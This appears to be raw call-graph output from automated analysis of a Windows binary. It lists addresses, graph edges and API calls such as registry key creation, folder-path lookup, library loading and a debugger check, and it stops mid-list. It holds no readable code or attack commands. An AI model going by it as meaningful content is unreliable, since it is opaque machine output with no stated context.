1102efec 88858->88860 88859 1102f0b5 88874 1102f177 88859->88874 89274 11063880 88859->89274 88860->88846 89289 11027b20 88874->89289 90048 11143690 89206->90048 89208 11166654 85 API calls std::locale::facet::_Facet_Register 89210 11143795 89208->89210 89209 11143690 IsDBCSLeadByte 89209->89210 89210->89208 89210->89209 89211 1102ec64 89210->89211 89211->88788 89890 11081e70 89211->89890 89213 11061f66 89212->89213 89218 11061f17 89212->89218 89214 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 89213->89214 89215 1102f044 89214->89215 89215->88828 89216 11081e70 86 API calls 89216->89218 89218->89213 89218->89216 90060 11061e10 89218->90060 90076 111457a0 89219->90076 89222 111457a0 std::locale::facet::_Facet_Register 265 API calls 89223 11146517 wsprintfA 89222->89223 89224 11143e00 std::locale::facet::_Facet_Register 8 API calls 89223->89224 89225 11146534 89224->89225 89226 11146560 89225->89226 89228 11143e00 std::locale::facet::_Facet_Register 8 API calls 89225->89228 89227 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 89226->89227 89229 1114656c 89227->89229 89230 11146549 89228->89230 89229->88843 89230->89226 89231 11146550 89230->89231 89232 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 89231->89232 89233 1114655c 89232->89233 89233->88843 89235 1102a705 89234->89235 89242 1102a7d3 89234->89242 89236 111101b0 std::locale::facet::_Facet_Register 265 API calls 89235->89236 89237 1102a70c 89236->89237 89238 11061aa0 301 API calls 89237->89238 89240 1102a73b 89237->89240 89238->89240 89239 11063880 330 API calls 89241 1102a759 89239->89241 89240->89239 89241->89242 90166 110d1930 89241->90166 89242->88845 89244 1102a765 89245 1102a7c7 89244->89245 89247 1102a798 89244->89247 89246 110d0a10 265 API calls 89245->89246 89246->89242 90176 110d0a10 89247->90176 89251 111459c7 89250->89251 89252 111459e4 std::locale::facet::_Facet_Register 89251->89252 89253 111459fe 89251->89253 89262 111459d4 89251->89262 89255 111459f5 GetModuleFileNameA 89252->89255 89254 111457a0 std::locale::facet::_Facet_Register 265 API calls 89253->89254 89256 11145a04 89254->89256 89255->89256 89260 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 89256->89260 89257 11142e60 std::locale::facet::_Facet_Register 265 API calls 89258 11145a58 89257->89258 89259 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 89258->89259 89261 1102f0a3 89259->89261 89260->89262 89263 11143e00 89261->89263 89262->89257 89264 11143e21 89263->89264 89264->89264 89265 11143e7d CreateFileA 89264->89265 89266 11143ebe CloseHandle 89265->89266 89267 11143e9e 89265->89267 89270 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 89266->89270 89268 11143ea2 CreateFileA 89267->89268 89269 11143edb 89267->89269 89268->89266 89268->89269 89272 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 89269->89272 89271 11143ed7 89270->89271 89271->88859 89273 11143eea 89272->89273 89273->88859 89275 1105e820 79 API calls 89274->89275 89276 110638a8 89275->89276 90263 110627b0 89276->90263 91290 11061a70 89289->91290 89883 1114363e 89882->89883 89884 11143678 89882->89884 89883->89884 89887 11143662 89883->89887 89885 11142e60 std::locale::facet::_Facet_Register 265 API calls 89884->89885 89886 11143680 89885->89886 89886->88785 93359 11142ee0 267 API calls std::locale::facet::_Facet_Register 89887->93359 89889 11143668 89889->88785 89891 11081e7d 89890->89891 89892 11081e82 89890->89892 93360 11081c50 IsDBCSLeadByte 89891->93360 89894 11081e8b 89892->89894 89899 11081e9f 89892->89899 93361 1116558e 85 API calls 2 library calls 89894->93361 89896 11081e98 89896->88790 89897 11081f03 89897->88790 89898 11166654 85 API calls std::locale::facet::_Facet_Register 89898->89899 89899->89897 89899->89898 89901 11163c91 89900->89901 89902 1116450b __wcstoi64 79 API calls 89901->89902 89903 11163ca2 89902->89903 89903->88799 89906 111101b0 std::locale::facet::_Facet_Register 265 API calls 89905->89906 89907 11110e11 89906->89907 89908 11110e33 GetCurrentThreadId InitializeCriticalSection 89907->89908 89909 111101b0 std::locale::facet::_Facet_Register 265 API calls 89907->89909 89912 11110ea0 EnterCriticalSection 89908->89912 89913 11110e93 InitializeCriticalSection 89908->89913 89911 11110e2c 89909->89911 89911->89908 93362 1116305a 66 API calls std::exception::_Copy_str 89911->93362 89914 11110f5a LeaveCriticalSection 89912->89914 89915 11110ece CreateEventA 89912->89915 89913->89912 89914->88808 89917 11110ee1 89915->89917 89918 11110ef8 89915->89918 93364 11029a70 265 API calls 2 library calls 89917->93364 89919 111101b0 std::locale::facet::_Facet_Register 265 API calls 89918->89919 89922 11110eff 89919->89922 89920 11110e4f 93363 111634b1 RaiseException 89920->93363 89925 11110f1c 89922->89925 89926 11110de0 423 API calls 89922->89926 89927 111101b0 std::locale::facet::_Facet_Register 265 API calls 89925->89927 89926->89925 89928 11110f2c 89927->89928 89930 11110f3d 89928->89930 93365 11110280 InterlockedIncrement InterlockedIncrement CreateEventA 89928->93365 89931 11110040 423 API calls 89930->89931 89932 11110f55 89931->89932 89932->89914 89934 11061710 293 API calls 89933->89934 89935 11061ade 89934->89935 89936 111101b0 std::locale::facet::_Facet_Register 265 API calls 89935->89936 89937 11061b0b 89936->89937 89938 11061b24 89937->89938 89939 11061710 293 API calls 89937->89939 89940 111101b0 std::locale::facet::_Facet_Register 265 API calls 89938->89940 89939->89938 89941 11061b35 89940->89941 89942 11061710 293 API calls 89941->89942 89944 11061b4e 89941->89944 89942->89944 89943 11061ba2 89943->88816 89944->89943 89945 11142e60 std::locale::facet::_Facet_Register 265 API calls 89944->89945 89946 11061b76 89945->89946 89947 11061a70 274 API calls 89946->89947 89948 11061b86 89947->89948 89949 11061a70 274 API calls 89948->89949 89950 11061b94 89949->89950 89951 11061a70 274 API calls 89950->89951 89951->89943 89953 111101b0 std::locale::facet::_Facet_Register 265 API calls 89952->89953 89954 11061761 89953->89954 89955 11061777 InitializeCriticalSection 89954->89955 93366 11061210 266 API calls 3 library calls 89954->93366 89958 110617b7 89955->89958 89963 11061826 89955->89963 93367 1105f830 287 API calls 3 library calls 89958->93367 89960 110617d8 RegCreateKeyExA 89961 11061832 RegCreateKeyExA 89960->89961 89962 110617ff RegCreateKeyExA 89960->89962 89961->89963 89964 11061865 RegCreateKeyExA 89961->89964 89962->89961 89962->89963 89963->88820 89964->89963 89965->88838 89966->88842 90049 111436a6 90048->90049 90050 11143763 90049->90050 90055 11081d30 90049->90055 90050->89210 90052 111436cb 90053 11081d30 IsDBCSLeadByte 90052->90053 90054 111436fb _memmove 90053->90054 90054->89210 90056 11081d3c 90055->90056 90058 11081d41 __mbschr_l std::locale::facet::_Facet_Register 90055->90058 90059 11081c50 IsDBCSLeadByte 90056->90059 90058->90052 90059->90058 90061 11061e23 90060->90061 90062 11061e1e 90060->90062 90063 11061e41 90061->90063 90064 11061e29 wsprintfA 90061->90064 90062->89218 90066 11061e46 90063->90066 90067 11061e93 90063->90067 90065 11061e4d std::ios_base::_Ios_base_dtor _memset _memmove 90064->90065 90070 11061ed3 90065->90070 90071 11061eea 90065->90071 90074 111438d0 266 API calls 3 library calls 90066->90074 90067->90065 90068 11061e9b wsprintfA 90067->90068 90068->90065 90075 11029a70 265 API calls 2 library calls 90070->90075 90071->89218 90074->90065 90077 111457c2 90076->90077 90081 111457d9 std::locale::facet::_Facet_Register 90076->90081 90118 11029a70 265 API calls 2 library calls 90077->90118 90079 11145967 90082 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 90079->90082 90081->90079 90083 1114580c GetModuleFileNameA 90081->90083 90084 11145983 wsprintfA 90082->90084 90085 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 90083->90085 90084->89222 90086 11145821 90085->90086 90087 11145831 SHGetFolderPathA 90086->90087 90088 11145918 90086->90088 90090 1114585e 90087->90090 90091 1114587d SHGetFolderPathA 90087->90091 90120 11142e60 90088->90120 90090->90091 90093 11145864 90090->90093 90094 111458b2 std::locale::facet::_Facet_Register 90091->90094 90119 11029a70 265 API calls 2 library calls 90093->90119 90096 1102ad70 std::locale::facet::_Facet_Register 145 API calls 90094->90096 90098 111458c3 90096->90098 90100 11145240 90098->90100 90101 111452ca 90100->90101 90102 1114524b 90100->90102 90101->90088 90102->90101 90103 1114525b GetFileAttributesA 90102->90103 90104 11145275 90103->90104 90105 11145267 90103->90105 90129 11164bb8 90104->90129 90105->90088 90108 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 90109 11145286 90108->90109 90110 11145240 std::locale::facet::_Facet_Register 67 API calls 90109->90110 90117 111452a3 90109->90117 90111 11145296 90110->90111 90112 111452ac 90111->90112 90113 1114529e 90111->90113 90137 11163aa5 90112->90137 90114 11163aa5 _free 66 API calls 90113->90114 90114->90117 90116 111452b1 CreateDirectoryA 90116->90117 90117->90088 90121 11142e6a 90120->90121 90122 11142e6c 90120->90122 90121->90079 90123 11110230 std::locale::facet::_Facet_Register 265 API calls 90122->90123 90124 11142e92 90123->90124 90125 11142e9b _strncpy 90124->90125 90126 11142eb9 90124->90126 90125->90079 90165 11029a70 265 API calls 2 library calls 90126->90165 90130 11164bc9 _strlen 90129->90130 90133 1114527c 90129->90133 90131 11163a11 _malloc 66 API calls 90130->90131 90132 11164bdc 90131->90132 90132->90133 90143 1116cd5f 90132->90143 90133->90108 90138 11163ab0 HeapFree 90137->90138 90139 11163ad9 _free 90137->90139 90138->90139 90140 11163ac5 90138->90140 90139->90116 90164 1116a1af 66 API calls __getptd_noexit 90140->90164 90142 11163acb GetLastError 90142->90139 90144 1116cd74 90143->90144 90145 1116cd6d 90143->90145 90155 1116a1af 66 API calls __getptd_noexit 90144->90155 90145->90144 90150 1116cd92 90145->90150 90147 1116cd79 90156 1116edc4 11 API calls __mbsupr_s_l 90147->90156 90149 11164bee 90149->90133 90152 1116ed72 90149->90152 90150->90149 90157 1116a1af 66 API calls __getptd_noexit 90150->90157 90158 1116ec49 90152->90158 90155->90147 90156->90149 90157->90147 90159 1116ec68 _memset __call_reportfault 90158->90159 90160 1116ec86 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 90159->90160 90161 1116ed54 __call_reportfault 90160->90161 90162 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 90161->90162 90163 1116ed70 GetCurrentProcess TerminateProcess 90162->90163 90163->90133 90164->90142 90185 110d16d0 90166->90185 90169 110d197b 90171 110d1995 90169->90171 90172 110d1978 90169->90172 90170 110d1964 90199 11029a70 265 API calls 2 library calls 90170->90199 90171->89244 90172->90169 90200 11029a70 265 API calls 2 library calls 90172->90200 90258 110d0810 90176->90258 90186 110d16dc 90185->90186 90187 110d16f7 90186->90187 90188 110d16e0 90186->90188 90201 110d03e0 90187->90201 90230 11029a70 265 API calls 2 library calls 90188->90230 90195 110d172e 90195->90169 90195->90170 90196 110d1717 90231 11029a70 265 API calls 2 library calls 90196->90231 90202 110d03e9 90201->90202 90203 110d03ed 90202->90203 90204 110d0404 90202->90204 90232 11029a70 265 API calls 2 library calls 90203->90232 90206 110d0401 90204->90206 90207 110d0438 90204->90207 90206->90204 90233 11029a70 265 API calls 2 library calls 90206->90233 90208 110d0435 90207->90208 90209 110d0456 90207->90209 90208->90207 90234 11029a70 265 API calls 2 library calls 90208->90234 90213 110d12e0 90209->90213 90214 110d12ee 90213->90214 90215 110d1309 90214->90215 90216 110d12f2 90214->90216 90219 110d1306 90215->90219 90220 110d133c 90215->90220 90235 11029a70 265 API calls 2 library calls 90216->90235 90218 110d13b0 90218->90195 90218->90196 90219->90215 90236 11029a70 265 API calls 2 library calls 90219->90236 90220->90218 90220->90220 90237 110d0c30 90220->90237 90226 110d136f _memmove 90226->90218 90227 110d1399 90226->90227 90249 11029a70 265 API calls 2 library calls 90227->90249 90238 110d0c3d 90237->90238 90239 110d0c58 90238->90239 90240 110d0c41 90238->90240 90241 110d0c76 90239->90241 90243 110d0c55 90239->90243 90255 11029a70 265 API calls 2 library calls 90240->90255 90250 110d06a0 90241->90250 90243->90239 90256 11029a70 265 API calls 2 library calls 90243->90256 90248 110d0b70 268 API calls 2 library calls 90248->90226 90251 110d06ab 90250->90251 90252 110d06c2 90250->90252 90257 11029a70 265 API calls 2 library calls 90251->90257 90252->90226 90252->90248 90259 110d0829 90258->90259 90260 110d083c 90258->90260 90259->90260 90384 11145a70 90263->90384 90265 1106283c 90266 110d1930 268 API calls 90265->90266 90267 11062850 90266->90267 90269 11062a37 90267->90269 90318 11062864 std::ios_base::_Ios_base_dtor 90267->90318 90393 1116535d 90267->90393 90268 110637a8 90272 110d0a10 265 API calls 90268->90272 90271 1116535d _fgets 81 API calls 90269->90271 90270 11164c77 std::locale::facet::_Facet_Register 102 API calls 90270->90268 90274 11062a51 90271->90274 90370 11062931 std::ios_base::_Ios_base_dtor 90272->90370 90278 11062a58 90274->90278 90282 11062ab7 _strpbrk 90274->90282 90318->90268 90318->90270 90387 11145a83 std::ios_base::_Ios_base_dtor 90384->90387 90385 11145990 267 API calls 90385->90387 90387->90385 90388 11145aea std::ios_base::_Ios_base_dtor 90387->90388 90389 11145aa5 GetLastError 90387->90389 90486 11164ead 90387->90486 90388->90265 90389->90387 90390 11145ab0 Sleep 90389->90390 90391 11164ead std::locale::facet::_Facet_Register 143 API calls 90390->90391 90392 11145ac2 90391->90392 90392->90387 90392->90388 90394 11165369 __freefls@4 90393->90394 90395 1116537c 90394->90395 90396 111653ad 90394->90396 90905 1116a1af 66 API calls __getptd_noexit 90395->90905 90402 1116538c __freefls@4 90396->90402 90879 1116be59 90396->90879 90489 11164df1 90486->90489 90490 11164dfd __freefls@4 90489->90490 90491 11164e10 90490->90491 90494 11164e3d 90490->90494 90547 1116a1af 66 API calls __getptd_noexit 90491->90547 90493 11164e15 90548 1116edc4 11 API calls __mbsupr_s_l 90493->90548 90508 11172558 90494->90508 90505 11164e20 @_EH4_CallFilterFunc@8 __freefls@4 90509 11172564 __freefls@4 90508->90509 90552 1117459f 90509->90552 90547->90493 90548->90505 90553 111745c7 EnterCriticalSection 90552->90553 90554 111745b4 90552->90554 91293 11061970 91290->91293 91304 11061290 91293->91304 91305 111101b0 std::locale::facet::_Facet_Register 265 API calls 91304->91305 91306 110612ac 91305->91306 91307 110612f5 91306->91307 91308 110612b3 91306->91308 91363 1116305a 66 API calls std::exception::_Copy_str 91307->91363 91356 1105ee10 91308->91356 91311 110612eb 91312 11061304 91364 111634b1 RaiseException 91312->91364 91314 11061319 91357 1105ee21 LeaveCriticalSection 91356->91357 91358 1105ee2b 91356->91358 91357->91358 91359 1105ee3f 91358->91359 91360 11163aa5 _free 66 API calls 91358->91360 91361 1105ee85 91359->91361 91362 1105ee49 EnterCriticalSection 91359->91362 91360->91359 91361->91311 91362->91311 91363->91312 91364->91314 93359->89889 93360->89892 93361->89896 93362->89920 93363->89908 93365->89930 93366->89955 93367->89960 93398 110262f0 93399 110262fe GetProcAddress 93398->93399 93400 1102630f 93398->93400 93399->93400 93401 11026328 93400->93401 93402 1102631c K32GetProcessImageFileNameA 93400->93402 93404 1102632e GetProcAddress 93401->93404 93405 1102633f 93401->93405 93402->93401 93403 11026361 93402->93403 93404->93405 93406 11026346 93405->93406 93407 11026357 SetLastError 93405->93407 93407->93403 93408 1113d980 93409 1113d989 93408->93409 93410 1113d98e 93408->93410 93412 11139ed0 93409->93412 93413 11139f12 93412->93413 93414 11139f07 GetCurrentThreadId 93412->93414 93415 11139f20 93413->93415 93546 11029950 93413->93546 93414->93413 93553 11134830 93415->93553 93421 1113a011 93425 1113a042 FindWindowA 93421->93425 93432 1113a0da 93421->93432 93422 1113a59a 93423 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 93422->93423 93426 1113a5b2 93423->93426 93428 1113a057 IsWindowVisible 93425->93428 93425->93432 93426->93410 93427 11139f5c IsWindow IsWindowVisible 93429 11147060 std::locale::facet::_Facet_Register 21 API calls 93427->93429 93431 1113a05e 93428->93431 93428->93432 93430 11139f87 93429->93430 93433 1105e820 79 API calls 93430->93433 93431->93432 93437 11139a70 390 API calls 93431->93437 93434 1105e820 79 API calls 93432->93434 93443 1113a0ff 93432->93443 93436 11139fa3 IsWindowVisible 93433->93436 93454 1113a127 93434->93454 93435 1113a2b0 93440 11139a70 390 API calls 93435->93440 93447 1113a2ca 93435->93447 93436->93421 93439 11139fb1 93436->93439 93441 1113a07f IsWindowVisible 93437->93441 93438 1105e820 79 API calls 93444 1113a29f 93438->93444 93439->93421 93446 11139fb9 93439->93446 93440->93447 93441->93432 93448 1113a08e IsIconic 93441->93448 93442 1113a2e7 93790 1112ddd0 12 API calls 2 library calls 93442->93790 93443->93435 93443->93438 93444->93435 93445 1113a2a4 93444->93445 93788 1102d750 294 API calls std::locale::facet::_Facet_Register 93445->93788 93452 11147060 std::locale::facet::_Facet_Register 21 API calls 93446->93452 93447->93442 93789 1106c340 298 API calls 93447->93789 93448->93432 93453 1113a09f GetForegroundWindow 93448->93453 93457 11139fc3 GetForegroundWindow 93452->93457 93786 11132120 147 API calls 93453->93786 93454->93443 93459 1113a174 93454->93459 93468 11081d30 IsDBCSLeadByte 93454->93468 93455 1113a2ec 93460 1113a2f4 93455->93460 93461 1113a2fd 93455->93461 93456 1113a2ab 93456->93435 93465 11139fd2 EnableWindow 93457->93465 93466 11139ffe 93457->93466 93462 11143e00 std::locale::facet::_Facet_Register 8 API calls 93459->93462 93791 11132a10 89 API calls 3 library calls 93460->93791 93463 1113a314 93461->93463 93464 1113a308 93461->93464 93471 1113a186 93462->93471 93793 111326b0 299 API calls std::locale::facet::_Facet_Register 93463->93793 93472 1113a319 93464->93472 93792 11132780 299 API calls std::locale::facet::_Facet_Register 93464->93792 93784 11132120 147 API calls 93465->93784 93466->93421 93481 1113a00a SetForegroundWindow 93466->93481 93467 1113a0ae 93787 11132120 147 API calls 93467->93787 93468->93459 93470 1113a2fa 93470->93461 93476 1113a193 GetLastError 93471->93476 93494 1113a1a1 93471->93494 93478 1113a312 93472->93478 93479 1113a429 93472->93479 93483 11147060 std::locale::facet::_Facet_Register 21 API calls 93476->93483 93478->93472 93484 1113a331 93478->93484 93485 1113a3db 93478->93485 93487 11139600 295 API calls 93479->93487 93480 11139fe9 93785 11132120 147 API calls 93480->93785 93481->93421 93482 1113a0b5 93488 1113a0cb EnableWindow 93482->93488 93489 1113a0c4 SetForegroundWindow 93482->93489 93483->93494 93484->93479 93496 111101b0 std::locale::facet::_Facet_Register 265 API calls 93484->93496 93485->93479 93801 1103f920 68 API calls 93485->93801 93502 1113a42e 93487->93502 93488->93432 93489->93488 93490 11139ff0 EnableWindow 93490->93466 93491 1113a455 93504 1105e820 79 API calls 93491->93504 93545 1113a57a std::ios_base::_Ios_base_dtor 93491->93545 93493 1113a3ea 93802 1103f960 68 API calls 93493->93802 93494->93443 93495 1113a1f2 93494->93495 93499 11081d30 IsDBCSLeadByte 93494->93499 93497 11143e00 std::locale::facet::_Facet_Register 8 API calls 93495->93497 93500 1113a352 93496->93500 93501 1113a204 93497->93501 93499->93495 93505 1113a373 93500->93505 93794 11057eb0 308 API calls std::locale::facet::_Facet_Register 93500->93794 93501->93443 93507 1113a20b GetLastError 93501->93507 93502->93491 93700 11142d90 93502->93700 93503 1113a3f5 93803 1103f980 68 API calls 93503->93803 93519 1113a485 93504->93519 93795 1110fff0 InterlockedIncrement 93505->93795 93510 11147060 std::locale::facet::_Facet_Register 21 API calls 93507->93510 93510->93443 93512 1113a400 93804 1103f940 68 API calls 93512->93804 93513 1113a398 93796 1104d790 879 API calls 93513->93796 93516 1113a40b 93805 11110000 InterlockedDecrement 93516->93805 93517 1113a3a3 93797 1104ecd0 879 API calls 93517->93797 93520 1113a4cd 93519->93520 93521 1113a4d9 GetTickCount 93519->93521 93524 1113a4aa 93519->93524 93519->93545 93520->93521 93520->93545 93525 1113a4eb 93521->93525 93521->93545 93523 1113a3d9 93523->93479 93527 11147060 std::locale::facet::_Facet_Register 21 API calls 93524->93527 93529 11143a50 145 API calls 93525->93529 93526 1113a3ae 93798 1104ed40 879 API calls 93526->93798 93528 1113a4b5 GetTickCount 93527->93528 93528->93545 93531 1113a4f7 93529->93531 93533 11147af0 269 API calls 93531->93533 93532 1113a3b9 93799 1104d7d0 879 API calls 93532->93799 93535 1113a502 93533->93535 93537 11143a50 145 API calls 93535->93537 93536 1113a3c4 93536->93479 93800 110ec320 285 API calls 93536->93800 93538 1113a515 93537->93538 93806 110261a0 LoadLibraryA 93538->93806 93541 1113a522 93541->93541 93807 1112d6e0 GetProcAddress SetLastError 93541->93807 93543 1113a569 93544 1113a573 FreeLibrary 93543->93544 93543->93545 93544->93545 93545->93422 93808 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 93546->93808 93548 1102995e 93549 11029973 93548->93549 93809 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 93548->93809 93810 11089fe0 269 API calls 2 library calls 93549->93810 93552 1102997e 93552->93415 93554 11134872 93553->93554 93555 11134b94 93553->93555 93556 1105e820 79 API calls 93554->93556 93557 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 93555->93557 93559 11134892 93556->93559 93558 11134bac 93557->93558 93601 11134310 93558->93601 93559->93555 93560 1113489a GetLocalTime 93559->93560 93561 111348d1 LoadLibraryA 93560->93561 93562 111348b0 93560->93562 93811 11009940 LoadLibraryA 93561->93811 93563 11147060 std::locale::facet::_Facet_Register 21 API calls 93562->93563 93565 111348c5 93563->93565 93565->93561 93566 11134925 93812 110161e0 LoadLibraryA 93566->93812 93568 11134930 GetCurrentProcess 93569 11134955 GetProcAddress 93568->93569 93570 1113496d GetProcessHandleCount 93568->93570 93569->93570 93572 11134976 SetLastError 93569->93572 93571 1113497e 93570->93571 93573 111349a2 93571->93573 93574 11134988 GetProcAddress 93571->93574 93572->93571 93576 111349b0 GetProcAddress 93573->93576 93577 111349ca 93573->93577 93574->93573 93575 111349d7 SetLastError 93574->93575 93575->93576 93576->93577 93578 111349e4 SetLastError 93576->93578 93579 111349ef GetProcAddress 93577->93579 93578->93579 93580 11134a01 K32GetProcessMemoryInfo 93579->93580 93581 11134a0f SetLastError 93579->93581 93582 11134a17 93580->93582 93581->93582 93583 11147060 std::locale::facet::_Facet_Register 21 API calls 93582->93583 93589 11134a8d 93582->93589 93583->93589 93584 11134b6a 93585 11134b7a FreeLibrary 93584->93585 93586 11134b7d 93584->93586 93585->93586 93587 11134b87 FreeLibrary 93586->93587 93588 11134b8a 93586->93588 93587->93588 93588->93555 93590 11134b91 FreeLibrary 93588->93590 93589->93584 93591 1105e820 79 API calls 93589->93591 93590->93555 93592 11134ade 93591->93592 93593 1105e820 79 API calls 93592->93593 93594 11134b06 93593->93594 93595 1105e820 79 API calls 93594->93595 93596 11134b2d 93595->93596 93597 1105e820 79 API calls 93596->93597 93598 11134b54 93597->93598 93598->93584 93599 11134b65 93598->93599 93813 11027de0 265 API calls 2 library calls 93599->93813 93603 1113433d 93601->93603 93602 111347f9 93602->93421 93602->93422 93704 11139a70 93602->93704 93603->93602 93604 110d1930 268 API calls 93603->93604 93605 1113439e 93604->93605 93606 110d1930 268 API calls 93605->93606 93607 111343a9 93606->93607 93608 111343d7 93607->93608 93609 111343ee 93607->93609 93814 11029a70 265 API calls 2 library calls 93608->93814 93611 11147060 std::locale::facet::_Facet_Register 21 API calls 93609->93611 93613 111343fc 93611->93613 93815 110d1530 265 API calls 93613->93815 93701 11142daf 93700->93701 93702 11142d9a 93700->93702 93701->93491 93816 11142400 93702->93816 93705 11139eaf 93704->93705 93708 11139a8d 93704->93708 93706 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 93705->93706 93707 11139ebe 93706->93707 93707->93427 93708->93705 93709 11145c70 std::locale::facet::_Facet_Register 90 API calls 93708->93709 93710 11139acc 93709->93710 93710->93705 93711 1105e820 79 API calls 93710->93711 93712 11139afb 93711->93712 93948 1112d860 93712->93948 93714 11139c40 PostMessageA 93715 11139c55 93714->93715 93717 11139c65 93715->93717 93957 11110000 InterlockedDecrement 93715->93957 93716 1105e820 79 API calls 93718 11139c3c 93716->93718 93720 11139c6b 93717->93720 93721 11139c8d 93717->93721 93718->93714 93718->93715 93723 11139cc3 std::ios_base::_Ios_base_dtor 93720->93723 93724 11139cde 93720->93724 93958 11131320 313 API calls std::locale::facet::_Facet_Register 93721->93958 93731 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 93723->93731 93726 11143a50 145 API calls 93724->93726 93725 11139c95 93959 11147ad0 267 API calls 93725->93959 93729 11139ce3 93726->93729 93732 11147af0 269 API calls 93729->93732 93730 11139c9f 93960 1112da60 SetDlgItemTextA 93730->93960 93734 11139cda 93731->93734 93735 11139cea SetWindowTextA 93732->93735 93734->93427 93737 11139d06 93735->93737 93743 11139d0d std::ios_base::_Ios_base_dtor 93735->93743 93736 11139cb0 std::ios_base::_Ios_base_dtor 93736->93720 93961 111361c0 299 API calls 5 library calls 93737->93961 93738 11146710 271 API calls 93739 11139beb 93738->93739 93739->93714 93739->93716 93741 11139d64 93744 11139d78 93741->93744 93745 11139e3c 93741->93745 93742 11139d37 93742->93741 93748 11139d4c 93742->93748 93743->93741 93743->93742 93962 111361c0 299 API calls 5 library calls 93743->93962 93749 11139d9c 93744->93749 93964 111361c0 299 API calls 5 library calls 93744->93964 93747 11139e5d 93745->93747 93752 11139e4b 93745->93752 93753 11139e44 93745->93753 93970 110f8b70 86 API calls 93747->93970 93963 11132120 147 API calls 93748->93963 93966 110f8b70 86 API calls 93749->93966 93969 11132120 147 API calls 93752->93969 93968 111361c0 299 API calls 5 library calls 93753->93968 93755 11139e68 93755->93705 93761 11139e6c IsWindowVisible 93755->93761 93757 11139da7 93757->93705 93763 11139daf IsWindowVisible 93757->93763 93759 11139d5c 93759->93741 93761->93705 93765 11139e7e IsWindowVisible 93761->93765 93762 11139d86 93762->93749 93766 11139d92 93762->93766 93763->93705 93767 11139dc6 93763->93767 93764 11139e5a 93764->93747 93765->93705 93768 11139e8b EnableWindow 93765->93768 93965 11132120 147 API calls 93766->93965 93770 11145c70 std::locale::facet::_Facet_Register 90 API calls 93767->93770 93971 11132120 147 API calls 93768->93971 93773 11139dd1 93770->93773 93772 11139d99 93772->93749 93773->93705 93775 11139ddc GetForegroundWindow IsWindowVisible 93773->93775 93774 11139ea2 EnableWindow 93774->93705 93776 11139e01 93775->93776 93777 11139df6 EnableWindow 93775->93777 93967 11132120 147 API calls 93776->93967 93777->93776 93779 11139e08 93780 11139e1e EnableWindow 93779->93780 93781 11139e17 SetForegroundWindow 93779->93781 93782 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 93780->93782 93781->93780 93783 11139e38 93782->93783 93783->93427 93784->93480 93785->93490 93786->93467 93787->93482 93788->93456 93789->93442 93790->93455 93791->93470 93792->93478 93793->93472 93794->93505 93795->93513 93796->93517 93797->93526 93798->93532 93799->93536 93800->93523 93801->93493 93802->93503 93803->93512 93804->93516 93805->93523 93806->93541 93807->93543 93808->93548 93809->93548 93810->93552 93811->93566 93812->93568 93813->93584 93817 1114243f 93816->93817 93870 11142438 std::ios_base::_Ios_base_dtor 93816->93870 93818 111101b0 std::locale::facet::_Facet_Register 265 API calls 93817->93818 93819 11142446 93818->93819 93822 11142476 93819->93822 93823 11061aa0 301 API calls 93819->93823 93820 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 93821 11142d8a 93820->93821 93821->93701 93824 11062220 275 API calls 93822->93824 93823->93822 93825 111424b2 93824->93825 93826 111424b9 RegCloseKey 93825->93826 93827 111424c0 std::locale::facet::_Facet_Register 93825->93827 93826->93827 93828 111424cf 93827->93828 93829 1102a6d0 354 API calls 93827->93829 93830 11145990 267 API calls 93828->93830 93829->93828 93831 111424ec 93830->93831 93832 11143e00 std::locale::facet::_Facet_Register 8 API calls 93831->93832 93833 11142500 93832->93833 93834 11142517 93833->93834 93835 11063880 330 API calls 93833->93835 93836 111101b0 std::locale::facet::_Facet_Register 265 API calls 93834->93836 93835->93834 93837 1114251e 93836->93837 93838 1114253a 93837->93838 93839 11061710 293 API calls 93837->93839 93840 111101b0 std::locale::facet::_Facet_Register 265 API calls 93838->93840 93839->93838 93841 11142553 93840->93841 93842 1114256f 93841->93842 93843 11061710 293 API calls 93841->93843 93844 111101b0 std::locale::facet::_Facet_Register 265 API calls 93842->93844 93843->93842 93845 11142588 93844->93845 93846 111425a4 93845->93846 93847 11061710 293 API calls 